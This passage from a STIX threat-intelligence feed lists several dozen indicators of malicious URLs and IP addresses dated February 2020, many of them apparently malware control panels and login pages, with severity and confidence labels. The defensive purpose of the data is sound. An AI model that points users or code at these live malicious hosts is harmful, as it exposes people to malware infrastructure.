CyberCrime","id":"indicator--19914258-5bed-4f35-8f57-f639b0d9c1a0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-20T05:16:07.933Z","name":"mal_url: http://5.8.88.68/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.8.88.68/login']","type":"indicator","valid_from":"2020-02-20T05:16:07.933Z"} +{"created":"2020-02-20T05:16:27.52Z","description":"TS ID: 55330801573; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--a1d0cc69-641e-4588-92f4-0ad9713860e1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-20T05:16:27.52Z","name":"mal_url: http://f0400017.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0400017.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:16:27.52Z"} +{"created":"2020-02-20T05:16:27.557Z","description":"TS ID: 55330801572; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--52371067-94be-4a79-b45d-8de115e81e86","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-02-20T05:16:27.557Z","name":"mal_url: http://f0391202.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391202.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:16:27.557Z"} +{"created":"2020-02-20T05:16:37.354Z","description":"TS ID: 55328307469; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--0e0682f9-a160-46c2-ba7f-ba9dc2858f7e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:16:37.354Z","name":"mal_url: http://ld7fa9c9.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ld7fa9c9.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-20T05:16:37.354Z"} +{"created":"2020-02-20T05:16:41.613Z","description":"TS ID: 55330801557; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--c7e63dd5-c41f-4fd4-bbaa-8b54a1a1a227","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-02-20T05:16:41.613Z","name":"mal_ip: 161.117.178.167","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '161.117.178.167']","type":"indicator","valid_from":"2020-02-20T05:16:41.613Z"} +{"created":"2020-02-20T05:16:57.739Z","description":"TS ID: 55328307494; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--9f847df6-9c88-4a03-b852-394fd8a77f58","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-20T05:16:57.739Z","name":"mal_url: http://referral-casino.club/1/stats/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://referral-casino.club/1/stats/admin.php']","type":"indicator","valid_from":"2020-02-20T05:16:57.739Z"} +{"created":"2020-02-20T05:16:57.764Z","description":"TS ID: 55328307481; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime","id":"indicator--479ea508-2ae1-4aea-825b-e83914fb8d53","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T05:16:57.764Z","name":"mal_url: http://brokenhead.xyz/Work5/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://brokenhead.xyz/Work5/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:16:57.764Z"} +{"created":"2020-02-20T05:16:57.791Z","description":"TS ID: 55328307476; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--051488db-6441-4ca9-9e5f-c8656e3b1d9f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-02-20T05:16:57.791Z","name":"mal_url: http://mediagift.vn/.ki/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mediagift.vn/.ki/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:16:57.791Z"} +{"created":"2020-02-20T05:17:10.129Z","description":"TS ID: 55328307464; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--d5a928aa-3237-4c44-93e8-f73eb20dc728","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-20T05:17:10.129Z","name":"mal_ip: 185.98.87.59","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.98.87.59']","type":"indicator","valid_from":"2020-02-20T05:17:10.129Z"} +{"created":"2020-02-20T05:18:20.205Z","description":"TS ID: 55330801629; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--db19cb4e-25ad-46d3-a944-6e53f62d230c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-20T05:18:20.205Z","name":"mal_url: http://liweff.eu/vla/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://liweff.eu/vla/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T05:18:20.205Z"} +{"created":"2020-02-20T05:18:20.412Z","description":"TS ID: 55328307485; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime","id":"indicator--438a519a-17ed-422b-a21d-0262b4b2fc0e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T05:18:20.412Z","name":"mal_url: http://brokenhead.xyz/Work2/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://brokenhead.xyz/Work2/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:18:20.412Z"} +{"created":"2020-02-20T05:18:22.703Z","description":"TS ID: 55330801601; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--7279d49d-39e4-42d1-8fb7-14ddb56d67d7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:18:22.703Z","name":"mal_url: http://castmart.ga/~zadmin/lmark/pop/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/lmark/pop/uMc.php']","type":"indicator","valid_from":"2020-02-20T05:18:22.703Z"} +{"created":"2020-02-20T05:18:31.965Z","description":"TS ID: 55328307489; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--70ae46d6-4f8c-4601-ac48-84848ca04719","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:18:31.965Z","name":"mal_url: http://158.69.39.138/file/panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://158.69.39.138/file/panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:18:31.965Z"} +{"created":"2020-02-20T05:18:31.986Z","description":"TS ID: 55328307482; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime","id":"indicator--11637bfb-fd5b-482b-83b0-ab8a49aa80e1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T05:18:31.986Z","name":"mal_url: http://brokenhead.xyz/Work6/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://brokenhead.xyz/Work6/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:18:31.986Z"} +{"created":"2020-02-20T05:18:33.111Z","description":"TS ID: 55330801593; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--b2cc241b-8f9a-494d-b842-74bc151bec7a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-20T05:18:33.111Z","name":"mal_url: http://febspxiii.xyz/DBY/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxiii.xyz/DBY/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:18:33.111Z"} +{"created":"2020-02-20T05:18:47.389Z","description":"TS ID: 55330801620; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--ac992a06-7013-4af2-b5c0-5c99f556d5b0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-20T05:18:47.389Z","name":"mal_url: http://rds2020.space/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://rds2020.space/login']","type":"indicator","valid_from":"2020-02-20T05:18:47.389Z"} +{"created":"2020-02-20T05:18:47.406Z","description":"TS ID: 55330801615; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--d723c08e-997d-483e-91e0-2ba6048e3683","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-65"],"modified":"2020-02-20T05:18:47.406Z","name":"mal_url: http://vysyyvyvm.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://vysyyvyvm.myjino.ru/login']","type":"indicator","valid_from":"2020-02-20T05:18:47.406Z"} +{"created":"2020-02-20T05:18:47.424Z","description":"TS ID: 55330801583; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--734a20dd-4f6e-4ca9-8eac-4cdd6b82a122","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-20T05:18:47.424Z","name":"mal_url: http://makadicuosde.cf/makave/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://makadicuosde.cf/makave/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:18:47.424Z"} +{"created":"2020-02-20T05:18:52.122Z","description":"TS ID: 55328307475; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--e4109b4c-b56f-4f16-818f-0db54e50f5e1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-02-20T05:18:52.122Z","name":"mal_url: http://tailuong.com.vn/.gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tailuong.com.vn/.gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:18:52.122Z"} +{"created":"2020-02-20T05:19:37.033Z","description":"TS ID: 55328307484; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime","id":"indicator--4c7e5535-9899-4967-86bb-e303b03a1122","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T05:19:37.033Z","name":"mal_url: http://brokenhead.xyz/Work3/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://brokenhead.xyz/Work3/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:19:37.033Z"} +{"created":"2020-02-20T05:19:37.099Z","description":"TS ID: 55328307477; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--ea537667-1f37-4050-bb51-85fee813e39c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-20T05:19:37.099Z","name":"mal_url: http://epperfums.com/duck/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/duck/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:19:37.099Z"} +{"created":"2020-02-20T05:19:44.991Z","description":"TS ID: 55328307478; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--b6919ef9-68eb-48f5-9bc5-cdb35182e3d5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-20T05:19:44.991Z","name":"mal_url: http://epperfums.com/dull/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/dull/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:19:44.991Z"} +{"created":"2020-02-20T05:19:49.844Z","description":"TS ID: 55330801566; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--ddf3b3c7-d5f7-42d7-b013-767315de4745","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-63"],"modified":"2020-02-20T05:19:49.844Z","name":"mal_url: http://f0404175.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0404175.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:19:49.844Z"} +{"created":"2020-02-20T05:19:58.679Z","description":"TS ID: 55330801607; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--12edd75d-2558-498f-93a6-b628c3a21f85","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:19:58.679Z","name":"mal_url: http://castmart.ga/~zadmin/lmark/frega/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/lmark/frega/uMc.php']","type":"indicator","valid_from":"2020-02-20T05:19:58.679Z"} +{"created":"2020-02-20T05:21:46.589Z","description":"TS ID: 55328307479; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime","id":"indicator--7a99b0ea-a361-4d6f-9c75-a1cd9ac41b1b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T05:21:46.589Z","name":"mal_url: http://brokenhead.xyz/Work8/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://brokenhead.xyz/Work8/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:21:46.589Z"} +{"created":"2020-02-20T05:22:19.894Z","description":"TS ID: 55330801609; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--09479a9a-0c30-4029-a396-afa64343f065","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:22:19.894Z","name":"mal_url: http://castmart.ga/~zadmin/lmark/em/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/lmark/em/uMc.php']","type":"indicator","valid_from":"2020-02-20T05:22:19.894Z"} +{"created":"2020-02-20T05:24:01.214Z","description":"TS ID: 55330801569; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--434af7fc-410e-404d-8c8c-8875f92cb0c0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-20T05:24:01.214Z","name":"mal_url: http://f0402912.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0402912.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:24:01.214Z"} +{"created":"2020-02-20T05:24:21.239Z","description":"TS ID: 55330801567; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--3ea0e805-8fa3-40ce-84e5-bf39318f35a6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-02-20T05:24:21.239Z","name":"mal_url: http://f0404052.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0404052.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:24:21.239Z"} +{"created":"2020-02-20T05:24:33.205Z","description":"TS ID: 55330801581; iType: mal_url; State: active; Org: Media Antar Nusa PT.; Source: CyberCrime","id":"indicator--b9cccc62-550f-4f5b-bb32-f580c23fe382","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T05:24:33.205Z","name":"mal_url: http://sariincofood.co.id/oxo/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://sariincofood.co.id/oxo/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:24:33.205Z"} +{"created":"2020-02-20T05:24:35.843Z","description":"TS ID: 55330801559; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--314ecb7a-db3a-4a64-9c0c-1361891c26c3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-59"],"modified":"2020-02-20T05:24:35.843Z","name":"mal_ip: 193.32.188.146","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '193.32.188.146']","type":"indicator","valid_from":"2020-02-20T05:24:35.843Z"} +{"created":"2020-02-20T05:24:47.629Z","description":"TS ID: 55330801610; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--d594d88f-2e74-4539-99a3-7fc7ae29ac7f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:24:47.629Z","name":"mal_url: http://castmart.ga/~zadmin/lmark/aps/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/lmark/aps/uMc.php']","type":"indicator","valid_from":"2020-02-20T05:24:47.629Z"} +{"created":"2020-02-20T05:24:47.645Z","description":"TS ID: 55330801575; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--d20e7f50-caac-4054-b816-6f4a9a9283b9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-20T05:24:47.645Z","name":"mal_url: http://thefieldagent.net/ys/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://thefieldagent.net/ys/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:24:47.645Z"} +{"created":"2020-02-20T05:25:26.502Z","description":"TS ID: 55328307491; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--fb3209c5-4de8-4554-9bb4-ed8cc2b19915","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-02-20T05:25:26.502Z","name":"mal_url: http://instaboom-hello.site/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://instaboom-hello.site/login.php']","type":"indicator","valid_from":"2020-02-20T05:25:26.502Z"} +{"created":"2020-02-20T05:25:26.525Z","description":"TS ID: 55328307488; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--592a57f8-b59a-4018-9167-307225a207ef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T05:25:26.525Z","name":"mal_url: http://biznetvgator.com/greets/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://biznetvgator.com/greets/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:25:26.525Z"} +{"created":"2020-02-20T05:25:29.508Z","description":"TS ID: 55328307495; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime","id":"indicator--56e543f4-111a-4764-af25-ee784f35a7c6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:25:29.508Z","name":"mal_url: http://castmart.ga/~zadmin/azrt/emma/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/azrt/emma/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T05:25:29.508Z"} +{"created":"2020-02-20T05:25:29.532Z","description":"TS ID: 55328307487; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--a2e1a901-7ad5-4be0-9fad-7e83cb7d35a7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-20T05:25:29.532Z","name":"mal_url: http://brokenbrains.xyz/Pablo/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://brokenbrains.xyz/Pablo/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:25:29.532Z"} +{"created":"2020-02-21T02:51:41.341Z","description":"TS ID: 55333174445; iType: mal_url; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--84d5a06f-cbc3-4504-b0d0-ea23b99182ba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-21T02:51:41.341Z","name":"mal_url: http://nenengdsa.ug/QnSrw25SkhlxsF5P/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nenengdsa.ug/QnSrw25SkhlxsF5P/login.php']","type":"indicator","valid_from":"2020-02-21T02:51:41.341Z"} +{"created":"2020-02-21T02:51:50.176Z","description":"TS ID: 55333174449; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--56cda4af-704b-41e7-8cc3-6140c163a22a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-02-21T02:51:50.176Z","name":"mal_url: http://j1041747.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://j1041747.myjino.ru/login']","type":"indicator","valid_from":"2020-02-21T02:51:50.176Z"} +{"created":"2020-02-21T02:51:50.296Z","description":"TS ID: 55333174441; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime","id":"indicator--3a6903d8-e46b-4918-a99d-21ae21465bde","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-21T02:51:50.296Z","name":"mal_url: http://sadhate.zzz.com.ua/dashboard/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://sadhate.zzz.com.ua/dashboard/admin.php']","type":"indicator","valid_from":"2020-02-21T02:51:50.296Z"} +{"created":"2020-02-21T02:52:28.296Z","description":"TS ID: 55333174457; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ec1f4e5c-0878-4dcf-9141-4a83b8abeb2c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-21T02:52:28.296Z","name":"mal_url: http://groysman.club/host/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://groysman.club/host/admin.php']","type":"indicator","valid_from":"2020-02-21T02:52:28.296Z"} +{"created":"2020-02-21T02:52:31.697Z","description":"TS ID: 55333174438; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--40502e97-56ae-4194-81d7-fc08ebff68c1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-21T02:52:31.697Z","name":"mal_url: http://nortonlilly.info/ace/ts/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/ace/ts/login.php']","type":"indicator","valid_from":"2020-02-21T02:52:31.697Z"} +{"created":"2020-02-21T02:52:33.704Z","description":"TS ID: 55333174439; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--d9ed2a5f-0f87-4d87-adec-7a925fc848e4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-21T02:52:33.704Z","name":"mal_url: http://zdwallcoveing.com/cream/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://zdwallcoveing.com/cream/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-21T02:52:33.704Z"} +{"created":"2020-02-21T02:52:34.992Z","description":"TS ID: 55333174446; iType: mal_ip; State: active; Org: Aksinet Ltd.; Source: CyberCrime","id":"indicator--097b92f4-6865-49db-8e59-2a89df364749","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-21T02:52:34.992Z","name":"mal_ip: 84.38.180.229","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '84.38.180.229']","type":"indicator","valid_from":"2020-02-21T02:52:34.992Z"} +{"created":"2020-02-21T02:52:35.038Z","description":"TS ID: 55333174442; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime","id":"indicator--03ea9edc-6654-4287-b452-988c85380295","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-60"],"modified":"2020-02-21T02:52:35.038Z","name":"mal_url: http://jusper.zzz.com.ua/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jusper.zzz.com.ua/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:52:35.038Z"} +{"created":"2020-02-21T02:52:38.593Z","description":"TS ID: 55333174440; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime","id":"indicator--99f64515-7513-4764-b278-987c5df8484b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-02-21T02:52:38.593Z","name":"mal_url: http://azur.kl.com.ua/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://azur.kl.com.ua/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:52:38.593Z"} +{"created":"2020-02-21T02:53:25.758Z","description":"TS ID: 55333174450; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--afdd7c21-d8c6-419e-84be-5c8b2ce1a829","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-21T02:53:25.758Z","name":"mal_url: http://d98527ix.beget.tech/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://d98527ix.beget.tech/login']","type":"indicator","valid_from":"2020-02-21T02:53:25.758Z"} +{"created":"2020-02-21T02:53:31.865Z","description":"TS ID: 55333174452; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--858c680e-7b33-4345-b23c-bbc2a1efb9e1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-21T02:53:31.865Z","name":"mal_url: http://corpcougar.com/new/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://corpcougar.com/new/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-21T02:53:31.865Z"} +{"created":"2020-02-21T02:53:31.9Z","description":"TS ID: 55333174443; iType: mal_url; State: active; Org: Fanavari Server Pars Argham Company Gostar Ltd.; Source: CyberCrime","id":"indicator--4a97fc3d-210e-4367-ad04-f1b966433a32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-21T02:53:31.9Z","name":"mal_url: http://perca.ir/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://perca.ir/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:53:31.9Z"} 